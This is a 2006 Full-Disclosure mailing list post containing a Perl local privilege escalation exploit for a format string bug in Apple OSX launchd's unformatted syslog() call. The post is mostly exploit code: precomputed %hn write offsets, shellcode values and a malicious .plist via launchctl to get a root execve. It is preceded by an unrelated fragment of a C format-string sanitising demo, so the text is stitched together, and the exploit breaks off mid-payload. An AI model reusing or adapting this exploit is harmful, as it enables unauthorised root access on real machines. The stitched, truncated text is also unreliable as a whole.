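    printf("unformatted: %s\n", out);   /* prints: progress 100% done */
    log_formatted(out, sizeof out, label);
    printf("formatted:   %s\n", out);   /* prints: progress 100%% done */
    printf("directive in \"%s\": %d\n", label, has_format_directive(label));
    printf("directive in \"%%112$hn\": %d\n", has_format_directive("%112$hn"));
    return 0;
}
```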



[Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'

2006-06-28 Thread K F (lists)

You couldn't be more wrong if you called it a Canadian Goose!

-KF
#!/usr/bin/perl
# http://www.digitalmunition.com/FailureToLaunch.pl 
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is a practical application of Non Executable Stack Lovin - 
http://www.digitalmunition.com/NonExecutableLovin.txt
#
# This code currently jumps into 0x181 via dyld_stub_close()
#
# This exploit will create a malicious .plist file for you to use with launchctl
# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents 
#
# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo
# 
# k-fs-computer:~ kf$ ls -al /sbin/launchd
# -rwsr-sr-x   1 root  wheel  161944 Feb 19 04:46 /sbin/launchd
# k-fs-computer:~ kf$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures
# /sbin/launchd (for architecture i386):  Mach-O executable i386
# /sbin/launchd (for architecture ppc):   Mach-O executable ppc
#
# ./src/SystemStarter.c:374:  syslog(level, buf);
# proactive security eh? 

foreach $key (keys %ENV) {

delete $ENV{$key};

}

$writeaddr = 0xa0011163;  # close()
#$writeaddr = 0xa00119f1;  # cxa_finalize() (must wait 25 seconds or so if you 
use this one)

$sc = (0x181);  

# both of these arrays are put in size order due to the multiple writes via 
unformatted syslog() call

# seteuid after thought... whoops...I had to move some shit arround to account 
for this
@seteuid =
([$sc+2,  $sc+4,  $sc,$sc+6],
 [0x5050, 0xb7b0, 0xc031, 0x80cd], );

# Write the following instructions to 0xa0011163 dyld_stub_close as well as 
nemos execve() to 0x181
# mov$0x181,%eax
# jmp*%eax
# 
@payload =
([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24, 
$sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4],
# 0
 [0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850, 
0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], ); 

$ENV{TERM_PROGRAM} = . . 
# string of write address 
pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l', 
$payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) . 
pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l', 
$payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) . 
pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l', 
$payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) . 
pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l', 
$seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ; 

# lazy non looped length calculations
$pay1  = $payload[1][0];
$pay2  = ($payload[1][1] - $pay1 - 0x1 ); 
$pay3  = ($payload[1][2] - $pay1 - $pay2 - 0x1); 
$pay4  = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1); 
$pay5  = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1); 
$pay6  = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1); 
$pay7  = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
0x1); 
$pay8  = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - 0x1); 
$pay9  = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - 0x1); 
$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - 0x1); 
$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - 0x1); 
$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1); 
$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2); 
$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2); 
$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2); 
$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 
$pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 - 
0x3); 
# seems I forgot the seteuid(0) 
$pay17 =  0xff + $seteuid[1][0];  
$pay18 = 0xff + ($seteuid[1][1] - $pay17); 
$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18  )  ; 
$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ;  
 # Something is fucking this write up... subtracting 0x8138 seems to help 

# The offset is off by 6 if you are trying to debug this in gdb
$format = 
%. . $pay1 . d . %246\$hn .
%. . $pay2 . d . %247\$hn .
%. . $pay3 . d . %248\$hn .
%. . $pay4 . d . %249\$hn .
%. . $pay5 . d . %250\$hn .
%. . $pay6 . d . %251\$hn .
%. . $pay7 . d . %252\$hn .
%. . $pay8 . d . %253\$hn .
%. . $pay9 . d . %254\$hn .
%. . $pay10 . d . %255\$hn .
%. . $pay11 . d . %256\$hn .
%. . $pay12 . d .